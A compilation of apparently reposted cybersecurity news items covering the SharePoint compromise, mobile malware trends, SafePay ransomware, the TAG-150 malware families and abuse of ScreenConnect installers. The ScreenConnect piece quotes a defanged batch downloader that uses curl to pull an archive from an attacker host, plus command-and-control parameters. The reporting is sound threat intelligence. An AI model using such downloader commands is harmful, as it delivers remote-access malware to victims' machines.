A recent investigation has revealed that Microsoft employed China-based engineers to maintain and support SharePoint software, the same collaboration platform that was recently compromised by Chinese state-sponsored hackers.

This revelation raises significant concerns about cybersecurity practices and potential insider threats within critical infrastructure systems used by hundreds of government agencies and private companies.

The cybersecurity incident, which Microsoft disclosed last month, involved sophisticated attacks on SharePoint “OnPrem” installations beginning as early as July 7, 2025.

Chinese hackers successfully exploited vulnerabilities in the on-premises version of SharePoint, gaining unauthorized access to computer systems across multiple high-profile targets, including the National Nuclear Security Administration and the Department of Homeland Security.

The attack demonstrated advanced persistent threat capabilities, with hackers maintaining access even after Microsoft’s initial security patch on July 8.

ProPublica analysts identified the concerning operational structure through internal Microsoft work-tracking system screenshots, revealing that China-based engineering teams had been responsible for SharePoint maintenance and bug fixes for several years.

This discovery adds a troubling dimension to the security breach, as the same personnel tasked with maintaining the software’s integrity may have inadvertently created vulnerabilities that adversaries could exploit.

The technical scope of the vulnerability was extensive, with the U.S. Cybersecurity and Infrastructure Security Agency confirming that the exploits enabled attackers to “fully access SharePoint content, including file systems and internal configurations, and execute code over the network.”

The attack vector allowed for remote code execution, effectively granting hackers administrative privileges over compromised systems.

Persistence and Evasion Mechanisms

The SharePoint exploit demonstrated sophisticated persistence tactics that allowed attackers to maintain access even after initial remediation efforts.

When Microsoft released the first security patch on July 8, the threat actors quickly adapted their methods to bypass the new protections, forcing the company to develop additional “more robust protections” in subsequent patches.

The persistence mechanism likely involved embedding malicious code within SharePoint’s configuration files and leveraging the platform’s extensive file system access capabilities.

Attackers could establish backdoors by modifying authentication modules or creating hidden administrative accounts within the SharePoint infrastructure. This approach enabled sustained access to sensitive government and corporate data while remaining undetected by standard security monitoring tools.

Microsoft has acknowledged the security implications and announced plans to relocate China-based support operations to alternative locations.

The company emphasized that all work was conducted under U.S.-based supervision with mandatory security reviews, though experts question whether such oversight measures adequately mitigate the inherent risks of foreign personnel handling sensitive system maintenance.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post New Report Claims Microsoft Used China-Based Engineers For SharePoint Support and Bug Fixing appeared first on Cyber Security News.

Cybercriminals unleashed a massive wave of mobile malware attacks during the second quarter of 2025, with security researchers detecting nearly 143,000 malicious installation packages targeting Android and iOS devices.

This surge represents a significant escalation in mobile cyber threats, affecting millions of users worldwide through sophisticated attack vectors designed to steal sensitive data, compromise financial information, and establish persistent backdoors on infected devices.

The malware landscape during Q2 2025 demonstrated remarkable diversity in both attack methodologies and target demographics.

Banking Trojans emerged as the dominant threat category, accounting for 42,220 malicious packages, while mobile ransomware Trojans contributed an additional 695 packages to the threat ecosystem.

The attacks primarily leveraged social engineering tactics, fake application stores, and compromised legitimate applications to infiltrate user devices, with cybercriminals showing increasing sophistication in bypassing modern security mechanisms.

According to Kaspersky Security Network data, the quarter witnessed 10.71 million blocked attacks involving malware, adware, and unwanted mobile software.

Trojans represented the most prevalent threat type, comprising 31.69% of all detected malicious activities.

Securelist researchers identified several concerning trends, including the emergence of pre-installed malware on certain device models and the evolution of existing threat families to incorporate new evasion techniques.

Among the most notable discoveries was the SparkKitty malware, a sophisticated threat targeting both Android and iOS platforms with image-stealing capabilities.

This malicious application specifically targeted cryptocurrency wallet recovery codes stored as screenshots in device galleries, representing a direct threat to digital asset security.

The malware operated by masquerading as legitimate applications while secretly exfiltrating sensitive visual data to remote servers controlled by cybercriminals.

Advanced Persistence and Evasion Mechanisms

The technical sophistication of Q2 2025 mobile malware reached unprecedented levels, particularly in persistence and detection evasion strategies.

The Trojan-Spy.AndroidOS.OtpSteal.a exemplified this evolution by disguising itself as a Virtual Private Network client while implementing the Notification Listener service to intercept one-time password codes from messaging applications and social networks.

This approach allowed attackers to bypass two-factor authentication mechanisms by automatically forwarding intercepted codes to Telegram channels via automated bots.

The malware’s persistence mechanisms involved deep system integration, with samples like Trojan-DDoS.AndroidOS.Agent.a embedding malicious Software Development Kits directly into adult content viewing applications.

This integration technique enabled the creation of distributed denial-of-service botnets from compromised mobile devices, demonstrating how cybercriminals are adapting traditional attack methodologies for mobile platforms.

The embedded SDK allowed for dynamic configuration of attack parameters, including target addresses and transmission frequencies, providing attackers with flexible command and control capabilities.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post 143,000 Malware Files Attacked Android and iOS Device Users in Q2 2025 appeared first on Cyber Security News.

A new ransomware threat has emerged as one of 2025’s most prolific cybercriminal operations, with SafePay ransomware claiming attacks against 73 victim organizations in June alone, followed by 42 additional victims in July.

This surge has positioned SafePay as a significant threat actor that security teams worldwide must understand and prepare to defend against.

Unlike traditional ransomware-as-a-service (RaaS) models that rely on affiliate networks, SafePay operates as a closed, independent group that maintains strict operational security.

The group’s rapid-fire attack methodology has proven remarkably effective, with more than 270 claimed victims documented throughout 2025.

Their operations target primarily mid-size and enterprise organizations across the United States, Germany, Great Britain, and Canada, focusing on industries critical to daily operations including manufacturing, healthcare, and construction.

The group’s emergence can be traced back to September 2024, arising in the aftermath of significant law enforcement operations that dismantled ALPHV (Black Cat) and severely disrupted LockBit’s infrastructure through Operation Cronos.

Bitdefender analysts identified parts of the SafePay ransomware that complement functionalities associated with LockBit, specifically LockBit Black, though the groups operate with distinctly different methodologies and encryption processes.

SafePay demonstrates an alarming capability to execute complete attack chains within 24-hour periods, moving from initial access through encryption with devastating efficiency.

Their victim selection appears methodical, targeting organizations with revenues typically around $5 million, though outliers include entities with revenues exceeding $100 million and one victim surpassing $40 billion in revenue.

Encryption and Evasion Mechanisms

SafePay employs sophisticated technical approaches that distinguish it from other ransomware families.

The malware utilizes the ChaCha20 encryption algorithm, implementing unique symmetric keys for each encrypted file while embedding additional keys directly within the ransomware executable.

This dual-key approach complicates recovery efforts and ensures that each victim’s encryption remains uniquely secured.

The ransomware demonstrates advanced defense evasion capabilities, including debugger detection avoidance and the ability to terminate processes associated with anti-malware functions.

Upon execution, SafePay immediately begins removing volume shadow copies to prevent system restoration, then proceeds to encrypt files with the .safepay extension while deploying ransom notes named “readme_safepay.txt” in affected directories.

One notable technical characteristic involves the malware’s geographic targeting logic.

SafePay performs language keyboard detection to identify systems using Cyrillic keyboards, preventing execution on these systems, suggesting potential Russian connections or alliances within the threat actor ecosystem.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post SafePay Ransomware Claiming Attacks Over 73 Victim Organizations in a Single Month appeared first on Cyber Security News.

A sophisticated new threat actor designated TAG-150 has emerged as a significant cybersecurity concern, demonstrating rapid development capabilities and technical sophistication in deploying multiple self-developed malware families since March 2025.

The group has successfully created and deployed CastleLoader, CastleBot, and their latest creation, CastleRAT, a previously undocumented remote access trojan that represents a concerning evolution in their operational capabilities.

The threat actor primarily initiates infections through Cloudflare-themed “ClickFix” phishing attacks and fraudulent GitHub repositories masquerading as legitimate applications.

Victims are deceived into copying and executing malicious PowerShell commands on their own devices, creating a seemingly user-initiated compromise that bypasses traditional security measures.

Despite limited overall engagement, the campaign achieved a remarkable 28.7% infection rate among victims who interacted with malicious links, demonstrating the effectiveness of their social engineering tactics.

Recorded Future analysts identified an extensive multi-tiered infrastructure supporting TAG-150’s operations, revealing a sophisticated command-and-control architecture spanning four distinct tiers.

The infrastructure includes victim-facing Tier 1 servers hosting various malware families, intermediate Tier 2 servers accessed via RDP, and higher-level Tier 3 and Tier 4 infrastructure used for operational management and backup purposes.

This complex network design suggests advanced operational security awareness and redundancy planning.

The malware ecosystem deployed by TAG-150 serves as an initial infection vector for delivering secondary payloads including SectopRAT, WarmCookie, HijackLoader, NetSupport RAT, and numerous information stealers such as Stealc, RedLine Stealer, and Rhadamanthys Stealer.

This diverse payload delivery capability indicates either a Malware-as-a-Service operation or strategic partnerships with other cybercriminal groups.

Advanced Persistence and Evasion Mechanisms

CastleRAT represents the most technically advanced component of TAG-150’s arsenal, available in both Python and C variants with distinct capabilities.

The malware employs a custom binary protocol utilizing RC4 encryption with hard-coded 16-byte keys for secure communications.

Both variants query the geolocation API ip-api.com to obtain location information through the infected host’s public IP address, enabling geographic targeting and operational intelligence gathering.

The C variant demonstrates significantly enhanced functionality, incorporating keylogging capabilities, screen capturing, clipboard monitoring, and sophisticated process injection techniques.

Recent developments include the implementation of C2 deaddrops hosted on Steam Community pages, representing an innovative approach to command-and-control communications that leverages legitimate gaming platforms to evade detection.

The malware maintains persistence through registry modifications and employs browser process masquerading for execution, while the Python variant includes self-deletion capabilities using PowerShell commands.

These evasion techniques, combined with the group’s use of anti-detection services like Kleenscan, demonstrate TAG-150’s commitment to operational longevity and stealth.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post TAG-150 Hackers Deploying Self-Developed Malware Families to Attack Organizations appeared first on Cyber Security News.

A sophisticated cyber campaign has emerged targeting U.S.-based organizations through trojanized ConnectWise ScreenConnect installers, marking a significant evolution in remote monitoring and management (RMM) tool abuse.

Since March 2025, these attacks have demonstrated increased frequency and technical sophistication, leveraging legitimate administrative software to establish persistent footholds within corporate networks.

The campaign employs deceptive social engineering tactics, distributing malicious installers disguised as official documents such as “agreement_support-pdf[.]Client[.]exe” and “Social_Security_Statement_Documents_386267[.]exe.”

These files appear to be legitimate support materials or financial documents, exploiting user trust to gain initial system access.

Once executed, the installers establish connections to attacker-controlled servers, effectively turning victims’ machines into remotely accessible assets.

What distinguishes this campaign from previous ScreenConnect abuse is the deployment of ClickOnce runner installers rather than traditional full installers.

Acronis researchers identified that these evolved installers lack embedded configuration data, instead fetching components and settings at runtime from compromised infrastructure.

This architectural change significantly complicates detection efforts, as traditional static analysis methods that rely on identifying suspicious embedded configurations become ineffective.

The threat actors demonstrate remarkable operational complexity by simultaneously deploying multiple remote access trojans (RATs) on compromised systems.

Within minutes of ScreenConnect installation, automated processes deploy both the well-documented AsyncRAT and a custom PowerShell-based RAT developed specifically for these campaigns.

This dual-deployment strategy suggests either redundancy planning or shared infrastructure among multiple threat groups.

Advanced Infection Chain Analysis

The technical sophistication of this campaign becomes apparent through examination of its multi-stage infection process.

The initial ClickOnce installer connects to attacker infrastructure using parameters such as “e = Support & y = Guest & h = morco[.]rovider[.]net & p = 8041,” establishing communication with command-and-control servers hosted on compromised virtual private servers.

Following successful installation, the malware leverages ScreenConnect’s built-in automation capabilities to execute a batch file designated as “BypaasaUpdate[.]bat.”

This initial payload functions as a sophisticated downloader, retrieving a compressed archive containing multiple encoded components:-

set LINK = https[:]//guilloton[.]fr/x[.]zip
set ZIP_PATH = %ProgramData% \ali[.]zip
curl - s - o "%ZIP_PATH%" %LINK%

The downloaded archive contains strategically named files including “1[.]txt” (containing AsyncRAT), “pe[.]txt” (AMSI bypass mechanisms), and “Skype[.]ps1” (PowerShell execution script).

This naming convention represents deliberate obfuscation designed to evade signature-based detection systems.

The persistence mechanism demonstrates particular ingenuity, establishing scheduled tasks that execute every minute while implementing mutex checking to prevent duplicate instances.

The PowerShell script “Skype[.]ps1” loads encoded .NET assemblies directly into memory, bypassing traditional file-based detection methods while maintaining continuous system access for threat actors.

This campaign represents a concerning evolution in RMM tool weaponization, combining legitimate software abuse with sophisticated evasion techniques to establish persistent organizational access.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post Threats Actors Weaponize ScreenConnect Installers to Gain Initial Access to Organizations appeared first on Cyber Security News.